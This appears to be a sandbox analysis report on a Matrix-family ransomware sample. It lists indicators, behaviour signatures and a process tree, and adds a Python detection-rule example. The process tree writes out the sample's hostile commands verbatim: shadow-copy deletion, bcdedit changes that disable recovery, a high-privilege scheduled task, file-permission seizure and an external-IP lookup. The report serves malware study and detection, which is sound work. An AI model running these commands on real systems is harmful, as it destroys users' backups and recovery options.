Analysis

max time kernel: 149s
max time network: 123s
platform: windows7_x64
resource: win7-20231215-en
resource tags: arch:x64 arch:x86 image:win7-20231215-en locale:en-us os:windows7-x64 system
submitted: 13-02-2024 05:15
Static task
static1

Behavioral tasks (task, sample, resource)
behavioral1   FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe   win7-20231215-en
behavioral2   FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe   win10v2004-20231215-en
behavioral3   FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe   win7-20231215-en
behavioral4   FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe   win10v2004-20231215-en
behavioral5   FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe   win7-20231215-en
behavioral6   FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe   win10v2004-20231215-en
behavioral7   FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe   win7-20231215-en
behavioral8   FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe   win10v2004-20231215-en
behavioral9   FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe   win7-20231215-en
behavioral10  FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe   win10v2004-20231222-en
behavioral11  FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe   win7-20231215-en
behavioral12  FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe   win10v2004-20231215-en
General

Target: FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Size: 1.2MB
MD5: 1fa1b6d4b3ed867c1d4baffc77417611
SHA1: afb5e385f9cc8910d7a970b6c32b8d79295579da
SHA256: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53
SHA512: 0600b92914a7489a6428b8e4217e5f24e1d149fc5807d86cc4de91b43be2470a1ddf77093c8732d4371a87fd163cc556e09d11a2c6655382a35a5f5741ae05a5
SSDEEP: 24576:K/SA+2lraRrjSJR5ezmT1dM9bBkNIDreFqO:2Xl9Ife
Malware Config

Extracted:
  http://myexternalip.com/raw

Extracted:
  C:\Program Files (x86)\Microsoft Office\Office14\Document Parts\1033\14\#FOX_README#.rtf
  https://bitmsg.me
  https://bitmsg.me/users/sign_up
  https://bitmsg.me/users/sign_in
Signatures

Matrix Ransomware (64 IoCs)
Targeted ransomware with information collection and encryption functionality.
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
pid   Process
3292  bcdedit.exe
3468  bcdedit.exe

Blocklisted process makes network request (1 IoC)
flow  pid   Process
9     3024  powershell.exe

Drops file in Drivers directory (1 IoC)
File created: C:\Windows\system32\Drivers\PROCEXP152.SYS (Process: gbw8Tp4V64.exe)

Sets service image path in registry (2 TTPs, 1 IoC)
Set value (str): \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" (Process: gbw8Tp4V64.exe)

Executes dropped EXE (3 IoCs)
pid   Process
2700  NWKkLa9n.exe
1192  gbw8Tp4V.exe
1636  gbw8Tp4V64.exe

Loads dropped DLL (11 IoCs)
pid   Process
1648  91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
1648  91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
1020  cmd.exe
1192  gbw8Tp4V.exe
2876  WerFault.exe
2876  WerFault.exe
2876  WerFault.exe
2876  WerFault.exe
2876  WerFault.exe
2876  WerFault.exe
2876  WerFault.exe

Modifies file permissions (1 TTP, 1 IoC)
pid   Process
2552  takeown.exe

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

resource                                                                        yara_rule
behavioral9/files/0x0006000000016d63-430.dat                                    upx
behavioral9/memory/1192-443-0x0000000000400000-0x0000000000477000-memory.dmp    upx
behavioral9/memory/1192-1143-0x0000000000400000-0x0000000000477000-memory.dmp   upx

Drops desktop.ini file(s) (43 IoCs)
Enumerates connected drives (3 TTPs, 44 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow  ioc
8     myexternalip.com

Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Set value (str): \REGISTRY\USER\S-1-5-21-452311807-3713411997-1028535425-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\OsRNBNcX.bmp" (Process: reg.exe)

Drops file in Program Files directory (64 IoCs)
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process
2612 schtasks.exe

Interacts with shadow copies (2 TTPs, 1 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process
2740 vssadmin.exe

Suspicious behavior: EnumeratesProcesses (4 IoCs)
pid Process
3024 powershell.exe
1636 gbw8Tp4V64.exe
1636 gbw8Tp4V64.exe
1636 gbw8Tp4V64.exe

Suspicious behavior: LoadsDriver (1 IoCs)
pid Process
1636 gbw8Tp4V64.exe

Suspicious use of AdjustPrivilegeToken (46 IoCs)
description pid Process
Token: SeDebugPrivilege 3024 powershell.exe
Token: SeDebugPrivilege 1636 gbw8Tp4V64.exe
Token: SeLoadDriverPrivilege 1636 gbw8Tp4V64.exe
Token: SeBackupPrivilege 2760 vssvc.exe
Token: SeRestorePrivilege 2760 vssvc.exe
Token: SeAuditPrivilege 2760 vssvc.exe
Token: SeIncreaseQuotaPrivilege 3812 WMIC.exe
Token: SeSecurityPrivilege 3812 WMIC.exe
Token: SeTakeOwnershipPrivilege 3812 WMIC.exe
Token: SeLoadDriverPrivilege 3812 WMIC.exe
Token: SeSystemProfilePrivilege 3812 WMIC.exe
Token: SeSystemtimePrivilege 3812 WMIC.exe
Token: SeProfSingleProcessPrivilege 3812 WMIC.exe
Token: SeIncBasePriorityPrivilege 3812 WMIC.exe
Token: SeCreatePagefilePrivilege 3812 WMIC.exe
Token: SeBackupPrivilege 3812 WMIC.exe
Token: SeRestorePrivilege 3812 WMIC.exe
Token: SeShutdownPrivilege 3812 WMIC.exe
Token: SeDebugPrivilege 3812 WMIC.exe
Token: SeSystemEnvironmentPrivilege 3812 WMIC.exe
Token: SeRemoteShutdownPrivilege 3812 WMIC.exe
Token: SeUndockPrivilege 3812 WMIC.exe
Token: SeManageVolumePrivilege 3812 WMIC.exe
Token: 33 3812 WMIC.exe
Token: 34 3812 WMIC.exe
Token: 35 3812 WMIC.exe
(The same 20 privilege adjustments are recorded a second time for 3812 WMIC.exe, which accounts for the 46 IoCs.)
Suspicious use of WriteProcessMemory (64 IoCs)
description pid Process procid_target
(Each row below is recorded four times in the report, giving 64 IoCs.)
PID 1648 wrote to memory of 2404 1648 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 29
PID 1648 wrote to memory of 2700 1648 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 31
PID 1648 wrote to memory of 2920 1648 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 33
PID 2920 wrote to memory of 3024 2920 cmd.exe 35
PID 1648 wrote to memory of 1584 1648 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 36
PID 1648 wrote to memory of 700 1648 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 38
PID 1584 wrote to memory of 1912 1584 cmd.exe 39
PID 1584 wrote to memory of 696 1584 cmd.exe 41
PID 1584 wrote to memory of 548 1584 cmd.exe 43
PID 700 wrote to memory of 1108 700 cmd.exe 42
PID 1648 wrote to memory of 1704 1648 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe 44
PID 1108 wrote to memory of 1768 1108 wscript.exe 46
PID 1704 wrote to memory of 2588 1704 cmd.exe 49
PID 1768 wrote to memory of 2612 1768 cmd.exe 48
PID 1704 wrote to memory of 2088 1704 cmd.exe 50
PID 1704 wrote to memory of 2552 1704 cmd.exe 51
Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.

Views/modifies file attributes (1 TTPs, 1 IoCs)
pid Process
2588 attrib.exe
Processes
[1] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe"
    - Matrix Ransomware
    - Loads dropped DLL
    - Drops desktop.ini file(s)
    - Enumerates connected drives
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    PID: 1648

    [2] C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWKkLa9n.exe"
        PID: 2404

    [2] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWKkLa9n.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWKkLa9n.exe" -n
        - Executes dropped EXE
        PID: 2700

    [2] C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XrqahlQb.txt"
        - Suspicious use of WriteProcessMemory
        PID: 2920

        [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
            - Blocklisted process makes network request
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 3024

    [2] C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\OsRNBNcX.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
        - Suspicious use of WriteProcessMemory
        PID: 1584

        [3] C:\Windows\SysWOW64\reg.exe
            Command line: reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\OsRNBNcX.bmp" /f
            - Sets desktop wallpaper using registry
            PID: 1912

        [3] C:\Windows\SysWOW64\reg.exe
            Command line: reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
            PID: 696

        [3] C:\Windows\SysWOW64\reg.exe
            Command line: reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
            PID: 548

    [2] C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\EQHMlr5B.vbs"
        - Suspicious use of WriteProcessMemory
        PID: 700

        [3] C:\Windows\SysWOW64\wscript.exe
            Command line: wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\EQHMlr5B.vbs"
            - Suspicious use of WriteProcessMemory
            PID: 1108

            [4] C:\Windows\SysWOW64\cmd.exe
                Command line: "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\AAgZ7an1.bat" /sc minute /mo 5 /RL HIGHEST /F
                - Suspicious use of WriteProcessMemory
                PID: 1768

                [5] C:\Windows\SysWOW64\schtasks.exe
                    Command line: schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\AAgZ7an1.bat" /sc minute /mo 5 /RL HIGHEST /F
                    - Creates scheduled task(s)
                    PID: 2612

            [4] C:\Windows\SysWOW64\cmd.exe
                Command line: "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
                PID: 2396

                [5] C:\Windows\SysWOW64\schtasks.exe
                    Command line: schtasks /Run /I /tn DSHCA
                    PID: 2680

    [2] C:\Windows\SysWOW64\cmd.exe
        Command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\F4W1lmNX.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""
        - Suspicious use of WriteProcessMemory
        PID: 1704

        [3] C:\Windows\SysWOW64\attrib.exe
            Command line: attrib -R -A -S "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"
            - Views/modifies file attributes
            PID: 2588

        [3] C:\Windows\SysWOW64\cacls.exe
            Command line: cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C
            PID: 2088

        [3] C:\Windows\SysWOW64\takeown.exe
            Command line: takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"
            - Modifies file permissions
            PID: 2552

        [3] C:\Windows\SysWOW64\cmd.exe
            Command line: C:\Windows\system32\cmd.exe /c gbw8Tp4V.exe -accepteula "SignHere.pdf" -nobanner
            - Loads dropped DLL
            PID: 1020

            [4] C:\Users\Admin\AppData\Local\Temp\FoxRansomware\gbw8Tp4V.exe
                Command line: gbw8Tp4V.exe -accepteula "SignHere.pdf" -nobanner
                - Executes dropped EXE
                - Loads dropped DLL
                PID: 1192

                [5] C:\Users\Admin\AppData\Local\Temp\gbw8Tp4V64.exe
                    Command line: gbw8Tp4V.exe -accepteula "SignHere.pdf" -nobanner
                    - Drops file in Drivers directory
                    - Sets service image path in registry
                    - Executes dropped EXE
                    - Enumerates connected drives
                    - Suspicious behavior: EnumeratesProcesses
                    - Suspicious behavior: LoadsDriver
                    - Suspicious use of AdjustPrivilegeToken
                    PID: 1636

                    [6] C:\Windows\system32\WerFault.exe
                        Command line: C:\Windows\system32\WerFault.exe -u -p 1636 -s 228
                        - Loads dropped DLL
                        PID: 2876

[1] C:\Windows\system32\taskeng.exe
    Command line: taskeng.exe {4F3647FA-9122-40C4-94CD-2BF27217A82E} S-1-5-21-452311807-3713411997-1028535425-1000:OZEMQECW\Admin:Interactive:[1]
    PID: 2844

    [2] C:\Windows\SYSTEM32\cmd.exe
        Command line: C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\AAgZ7an1.bat"
        PID: 1804

        [3] C:\Windows\system32\vssadmin.exe
            Command line: vssadmin Delete Shadows /All /Quiet
            - Interacts with shadow copies
            PID: 2740

        [3] C:\Windows\System32\Wbem\WMIC.exe
            Command line: wmic SHADOWCOPY DELETE
            - Suspicious use of AdjustPrivilegeToken
            PID: 3812

        [3] C:\Windows\system32\bcdedit.exe
            Command line: bcdedit /set {default} recoveryenabled No
            - Modifies boot configuration data using bcdedit
            PID: 3292

        [3] C:\Windows\system32\bcdedit.exe
            Command line: bcdedit /set {default} bootstatuspolicy ignoreallfailures
            - Modifies boot configuration data using bcdedit
            PID: 3468

        [3] C:\Windows\system32\schtasks.exe
            Command line: SCHTASKS /Delete /TN DSHCA /F
            PID: 2368

[1] C:\Windows\system32\vssvc.exe
    Command line: C:\Windows\system32\vssvc.exe
    - Suspicious use of AdjustPrivilegeToken
    PID: 2760
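The signatures flagged above (scheduled task creation, shadow-copy deletion and bcdedit changes run from the AAgZ7an1.bat task, the attrib/cacls/takeown sequence on a protected file, and the external-IP lookup through powershell) are the kind of thing a detection engineer turns into correlation rules. The Python below is an added example, not part of the sandbox report and not the malware's own code; it replays constructed process-creation events copied from the process tree above and correlates by parent PID, so the four recovery-inhibition commands under PID 1804 and the three unlock commands under PID 1704 each collapse into one finding. The event tuple layout, the benign control event, the extra external-IP services beside myexternalip.com (api.ipify.org, icanhazip.com) and icacls in the unlock-tool set are assumptions of the example, not observations from this run.

```python
"""Correlation rules for the behaviours in the process tree above, run offline
over constructed process-creation events.  Added example; not sandbox output."""
import re
from collections import defaultdict

# Constructed events (pid, ppid, image, command line) copied from the tree
# above, plus one benign control.  The tuple layout is an assumption, not a
# Sysmon EID 1 / Security 4688 schema.
PDF = r"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"
PS = ("powershell \"$webClient = New-Object -TypeName System.Net.WebClient; "
      "$webClient.DownloadString('http://myexternalip.com/raw')\"")
EVENTS = [
    (2920, 1648, "cmd.exe", '"C:\\Windows\\system32\\cmd.exe" /C ' + PS
     + '>"C:\\Users\\Admin\\AppData\\Local\\Temp\\FoxRansomware\\XrqahlQb.txt"'),
    (3024, 2920, "powershell.exe", PS),
    (2612, 1768, "schtasks.exe", 'schtasks /Create /tn DSHCA /tr '
     '"C:\\Users\\Admin\\AppData\\Roaming\\AAgZ7an1.bat" /sc minute /mo 5 /RL HIGHEST /F'),
    (2588, 1704, "attrib.exe", f'attrib -R -A -S "{PDF}"'),
    (2088, 1704, "cacls.exe", f'cacls "{PDF}" /E /G Admin:F /C'),
    (2552, 1704, "takeown.exe", f'takeown /F "{PDF}"'),
    (2740, 1804, "vssadmin.exe", "vssadmin Delete Shadows /All /Quiet"),
    (3812, 1804, "WMIC.exe", "wmic SHADOWCOPY DELETE"),
    (3292, 1804, "bcdedit.exe", "bcdedit /set {default} recoveryenabled No"),
    (3468, 1804, "bcdedit.exe", "bcdedit /set {default} bootstatuspolicy ignoreallfailures"),
    (4100, 4000, "cmd.exe", 'cmd.exe /c dir "C:\\Program Files"'),  # benign control (constructed)
]

# Single-event patterns for recovery inhibition (T1490), matched case-insensitively.
RECOVERY_INHIBIT = [
    (re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I), "vssadmin shadow deletion"),
    (re.compile(r"\bwmic(\.exe)?\s+shadowcopy\s+delete", re.I), "wmic shadow deletion"),
    (re.compile(r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+recoveryenabled\s+no", re.I), "recovery disabled"),
    (re.compile(r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+bootstatuspolicy\s+ignoreallfailures", re.I),
     "boot failure ignored"),
]
# schtasks /Create whose /tr target is a script or binary; group(2) is the path.
SCHTASKS_CREATE = re.compile(
    r'schtasks(\.exe)?\s+/create\b.*?/tr\s+"?([^"]+?\.(?:bat|cmd|vbs|js|ps1|exe))"?', re.I)
USER_WRITABLE = re.compile(r"\\AppData\\|\\Temp\\|\\ProgramData\\|\\Public\\", re.I)
# Tools used to strip protection from a file before touching it (icacls is an assumption).
UNLOCK_TOOLS = {"attrib.exe", "cacls.exe", "icacls.exe", "takeown.exe"}
QUOTED_PATH = re.compile(r'"([A-Za-z]:\\[^"]+)"')
# External-IP services: myexternalip.com is from the report, the others are assumptions.
EXT_IP_LOOKUP = re.compile(
    r"DownloadString\(\s*['\"]https?://(?:myexternalip\.com|api\.ipify\.org|icanhazip\.com)", re.I)


def detect(events):
    """Return (rule, pid, detail) findings; chain rules report the parent PID."""
    findings = []
    inhibit_by_parent = defaultdict(set)   # ppid -> distinct recovery-inhibition labels
    unlock_by_target = defaultdict(set)    # (ppid, path) -> unlock tools used on it
    for pid, ppid, image, cmd in events:
        for rx, label in RECOVERY_INHIBIT:
            if rx.search(cmd):
                findings.append(("recovery_inhibition", pid, label))
                inhibit_by_parent[ppid].add(label)
        m = SCHTASKS_CREATE.search(cmd)
        if m and USER_WRITABLE.search(m.group(2)):
            sev = "high" if re.search(r"/RL\s+HIGHEST", cmd, re.I) else "medium"
            findings.append(("persistence_schtask", pid, f"{sev}: {m.group(2)}"))
        if image.lower() in UNLOCK_TOOLS:
            p = QUOTED_PATH.search(cmd)
            if p:
                unlock_by_target[(ppid, p.group(1).lower())].add(image.lower())
        if image.lower() == "powershell.exe" and EXT_IP_LOOKUP.search(cmd):
            findings.append(("external_ip_lookup", pid, "powershell DownloadString"))
    # Correlation: two or more distinct inhibition commands from one parent is a chain.
    for ppid, labels in inhibit_by_parent.items():
        if len(labels) >= 2:
            findings.append(("recovery_inhibition_chain", ppid, ", ".join(sorted(labels))))
    # Correlation: two or more unlock tools aimed at the same file from one parent.
    for (ppid, path), tools in unlock_by_target.items():
        if len(tools) >= 2:
            findings.append(("file_unlock_chain", ppid, f"{', '.join(sorted(tools))} on {path}"))
    return findings


if __name__ == "__main__":
    for rule, pid, detail in detect(EVENTS):
        print(f"{rule:26} pid={pid:<5} {detail}")
```

Correlating on the parent PID is what keeps the unlock rule quiet in normal administration: an admin running takeown once on a file does not trigger it, while a batch file that runs attrib, cacls and takeown against the same path from one cmd.exe does. The benign control event produces no finding.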
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1)
Defense Evasion
- File and Directory Permissions Modification (1)
- Hide Artifacts (1)
  - Hidden Files and Directories (1)
- Indicator Removal (2)
  - File Deletion (2)
- Modify Registry (2)
Downloads
- Filesize: 1KB
  MD5: 092a0c3ba49e0edf0ee57428ea4c9d4e
  SHA1: 36773f1d399341ef5316f51a534e29337581d941
  SHA256: af913fb1d2b33d4f301a5cf285374ae71d4c1ae4cb37f26ee9cca53f1938e820
  SHA512: 701239651b4f9b70700544173d4fcdcf2e35ca75b709c77e84c306e96687df47bb2f95810489d20ceb234f0b9b85799623e80f58fd6fbb43a1e3481dd48b0e73
- Filesize: 8KB
  MD5: 780d8192b96ace15d3efce43ab816529
  SHA1: f5a2b684129fd1c6fd0c935a5a7277d21ae13633
  SHA256: 217b3a7d6f00a0ab7e0eaf0e650e362d185e91a17589126d834c5993fafd5894
  SHA512: 08d4601ea9f8e83f03f3fc3cc4ebffefff1b8e6b790684878e9ad9351ce23e86307b5388a8d5abc2c737f1c28168d51a56ec746627c24ee65a6ffcd0d21f517e
- Filesize: 246B
  MD5: f590beb1d601fcc601324badef6ea53a
  SHA1: 7c33634f6ba9c10ec688d237cd2a965e3963ce4d
  SHA256: 8325ed341a5baf675fcea6de9d2ac76e855d045e13fbc17deb4ebc8973b4a2c0
  SHA512: 74e6e6f1c1975a9a642d02adc6f439901691e34bfafe350150ba1bed2940ac938f66462c7f2d1e3d7ae31aa978cdda5ab2167a3ecdf3227d1a410c3a795c4c8d
- Filesize: 14B
  MD5: c74dacdd9331a6698efffe81ff66ac08
  SHA1: 79e8ce4bb5cc2436e95fad4a74a31aee7aa63043
  SHA256: 82ad297f8577dd8f868d0068e253c3d6b61a1e332d7038ed18d23da65b03ad6c
  SHA512: 24620715fb4e07f73db38962b2f95b77396d09a65f153c138f4d873e7f83f9cc72a16423ce2af745f8a04d1e657dfa7d9136ec3fd9ff5794b385ec33edae89da
- Filesize: 8KB
  MD5: 4c85e6ca19d25990f2744ae97c81a2a2
  SHA1: d3258985d11accfb8b0978c4fbe4e2104e69f67a
  SHA256: 16de82d85493b825bb17a4f5429f22b2ad4a5acb67cd4d1b5ee36108e4f243dc
  SHA512: 67f483e0dbddda903ca7f20f16fc5d12939ad27ea991fe68438dedd04cb8f361f4e1fc5073e7549469cd67b5a6cb991d5744642072b28c3e0930fe52f99ad46e
- Filesize: 899B
  MD5: 9faa44ab1100f2956d182f2fa345555c
  SHA1: 9cfe97f8180ced4e128e1b0dee9ce0297f75ee79
  SHA256: 9782996fdb8f76c1ddcfd48720ececdc5ae242fa04f245e1f6093a1eb0ba3cce
  SHA512: 816491988177dc6a40b71d8a12e009afda30f45f10ad40ec64ffdb0eba5eab5e6e82c7ce00e2581f5593d6552bec224aa60663f51b71480f29a6704df0bf61ad
- Filesize: 32KB
  MD5: 3334fe971a38a2e24d0dd07f10735d9b
  SHA1: 0735dc005a3c289d10e3b12af2e42a2b6cd69423
  SHA256: c69fefa54463e5c56a9fdf5c07d9c4a933c0516cf76ae64b94df2b1a01b61665
  SHA512: 3ea2274dbec4e982eac34fc02d85703a2d44f93ed09ffe4e55d2b2626985c72af4865fc9a8651a35babf55777d17d7bac851d4496b04caea92ed50da3f6e6b34
- Filesize: 181KB
  MD5: 2f5b509929165fc13ceab9393c3b911d
  SHA1: b016316132a6a277c5d8a4d7f3d6e2c769984052
  SHA256: 0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
  SHA512: c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
- Filesize: 265B
  MD5: feb8a00c6ca3576a6baa82c437dabd4a
  SHA1: ac3f91ac4a809c7ca02a38852996c28bd67e9de6
  SHA256: 8a93f58babe9638cd80e0367051f4a58fd90264270568fdc9239c6e4f80669e7
  SHA512: 07bb8c8045eea85dee3b46932a8b3c65da363f925848e1e5c5a02c0c99ada5ba849184ac2f8a80958eb09a1894e1c71f4deb80cd995414dff70f9fd588f7f969
- Filesize: 260B
  MD5: 53c495bdab4d6bfb1e1c0e3377634ff9
  SHA1: d22b4dd3f600b3a40848a1d8a74c069d6572bc39
  SHA256: c301cbcc22e73ade210c30c857cd100cd335c7be81bef26f4294842c8ed0f046
  SHA512: 24f78511f7572735ad6b072509e4e9bbfd59e8bf8ead7656d459a6a2a50843320ec038b22a0fab419bdfab1304d63b4f00ee078720811c32108b90ad8566a4c1
- Filesize: 1.2MB (same SHA256 as the submitted sample)
  MD5: 1fa1b6d4b3ed867c1d4baffc77417611
  SHA1: afb5e385f9cc8910d7a970b6c32b8d79295579da
  SHA256: 91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53
  SHA512: 0600b92914a7489a6428b8e4217e5f24e1d149fc5807d86cc4de91b43be2470a1ddf77093c8732d4371a87fd163cc556e09d11a2c6655382a35a5f5741ae05a5
- Filesize: 221KB
  MD5: 3026bc2448763d5a9862d864b97288ff
  SHA1: 7d93a18713ece2e7b93e453739ffd7ad0c646e9e
  SHA256: 7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
  SHA512: d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6